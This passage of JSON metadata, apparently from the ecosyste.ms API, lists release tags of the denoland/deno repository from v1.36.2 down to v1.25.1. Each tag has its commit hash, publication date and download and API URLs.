Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/ap